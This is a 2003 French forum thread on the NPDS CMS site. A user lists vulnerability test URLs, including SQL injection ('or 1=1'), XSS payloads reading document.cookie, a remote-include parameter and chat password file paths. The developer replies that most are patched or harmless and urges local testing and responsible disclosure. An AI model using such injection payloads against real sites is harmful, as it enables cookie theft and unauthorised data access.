|
gygylapeluche 21
| Posté : 18-06-2003 17:48
ct moi l'anonyme avant.
dsl si j'ai foutu le bordel...
demande moi si tu les veux tous....
Je suis à ta disposition....
Jai la fleme de tout retaper...
lol
|  Profil www
|
|
developpeur 24581
| Posté : 18-06-2003 21:30
Citation : "18-06-2003 17:46, Anonyme a écrit :
Ya un erreur sur le port 80
qui permet une attaque par deny de service
http://target.com/modules.php?name=Your_Account&op=userinfo&uname=
sur certain site npds, vous l'avez corrigez ?
http://www.nukesite.com/modules.php?name=News&file=article&sid=1234%20or%
201=1
==> c'est du phpnuke cela pas du NPDS (cela ne fait rien en dehors de faire merder le theme graphique)
Et celle là ???
Ca marche pas depuis laquelle ?
Et j'avais aussi celle-ci :
http://target.com/modules.php?op=modload&name=News&file=index&catid=&topic=>
==> c'est du phpnuke cela pas du NPDS (cela ne fait rien en dehors de faire merder le theme graphique)
Là je suis sûr de moi, le site il bug complètement quand on fait :
http://www.npds.org/forum/memberlist.php?
même sur le tiens dev.
==> cela ne fait rien en dehors de faire merder le theme graphique
http://www.npds.org/chat/!nicks.txt
http://www.npds.org/chat/!pwds.txt
==> cela ne fait rien en dehors de faire merder le theme graphique du Chat
<!script>alert(!!document.cookie!!);<!/script>
==> marche plus depuis longtemps ...
J'avais aussi celle là :
http://target/article.php?sid="><Img Src=!!javascript!!:alert(!!document.cookie!!)><Img Src="
c'est une css...
==> marche plus depuis longtemps ...
Et celle-ci sur le chat :
http://www.target.com/chat/data/usr
http://www.npds.org/user.php?caselist[bad_file.txt][path]=http://localhost
==> marche plus depuis longtemps ...
celle si qui marche bien aussi :
http://www.npds.org/forum/member.php?action=viewpro&member=%3Cdiv%3E%3Cfont%20color=%22red%22%3EMarc%3C/font%3E%3Cscript%3Ealert(%22Ruef%22);%3C/script%3E%3C/div%3E
==> Tu est certains ????
----------
|  Profil E-mail www
|
|
gygylapeluche 21
| Posté : 19-06-2003 12:38
EN faites j'ai juste resortiles failles que j'utilisaient avant....
ya bien longtemps.
Et puis je les ai vérifier en faisant un audit, sur npds...
Dsl
Si jai fait une connerie, il n'y avait aucune mauvaise intention .
Et je ne sais, pas si c'est moi.
Mais moon audit à marché du tonerre.
Et j'avoue que je lui fait confiance avec une bonne centaine de faille
nommé à haut risque
sql injection + failles sur les !include!s...
A parament vous avez remédiez à ces problèmes...
Je vais continuer à chercher sans faire de connerie d'acc...?
Ya certainement un trou à combler quelque part...
lol
|  Profil www
|
|
[-Jarod-] 1732
| |
developpeur 24581
| Posté : 19-06-2003 16:53
je ne suis pas contre mais je voudrais savoir qu'elles failles marchent rééllement ? (en dehors de faire merder le theme du site).
Mais si tu met le boxon sur npds.org ne t'étonne pas de prendre un coup de baton ... / test en local, on en discute, on trouve la parade, on publis la faille et la parade : voilà comment il faut faire normallement
A suivre |  Profil E-mail www
|
|
gygylapeluche 21
| Posté : 19-06-2003 17:52
Pas de problème.
Je vais tout simplement faire ça sur mon site.
Si je trouve quelque chose promis, je le met en ligne.
Je vais me pencher vers les failles !include!...
|  Profil www
|
|
axel 10065
| Posté : 19-06-2003 19:31
Citation : "19-06-2003 16:53, developpeur a écrit :
je ne suis pas contre mais je voudrais savoir qu'elles failles marchent rééllement ? (en dehors de faire merder le theme du site).
Mais si tu met le boxon sur npds.org ne t'étonne pas de prendre un coup de baton ... / test en local, on en discute, on trouve la parade, on publis la faille et la parade : voilà comment il faut faire normallement
A suivre"
----------
ovni ferait bien d'en prendre de la graine |  Profil E-mail www
|
|
ovni 10
| Posté : 20-06-2003 19:23
On parle de moi ????
Ta vue j'ai compris la lecon j'ai plus fait de bêtise.
Contrairement à gygylapeluche j'ai trouvé des failles qui marche actuellement mais s'est que de l'injection html alors s'est pas trop grave.
@+
|  Profil www
|
|
axel 10065
| Posté : 20-06-2003 21:17
Citation : "18-06-2003 17:48, gygylapeluche a écrit :
ct moi l'anonyme avant.
dsl si j'ai foutu le bordel...
demande moi si tu les veux tous....
Je suis à ta disposition....
Jai la fleme de tout retaper...
lol
"
----------
=> qu'estcequec'est qu'i a ft le vilain garcon ?? |  Profil E-mail www
|
|
developpeur 24581
| Posté : 20-06-2003 21:48
Ovni soit pas grincheu, fini le Chat et envoie moi le .... / tu est même sité dans la 5.0 pour tes recherches et découvertes alors .... |  Profil E-mail www
|
|
axel 10065
| Posté : 21-06-2003 00:03
c un honneur rare, ca
(PS : j'y suis moi ??) |  Profil E-mail www
|
|
ovni 10
| Posté : 21-06-2003 10:39
Je savais pas !!!
Merci beaucoup, je cours finir mon chat et tu la dimanche je pense.
Bye |  Profil www
|
|
developpeur 24581
| Posté : 21-06-2003 17:08
Axel : Evidemmmmmmmmmmmmmmmmmmmmmmmment |  Profil E-mail www
|
|
axel 10065
| |
Achel_Jay 2691
| Posté : 16-07-2003 11:13
coment faire bosser les autres => une carotte mouarf |  Profil E-mail www
|
|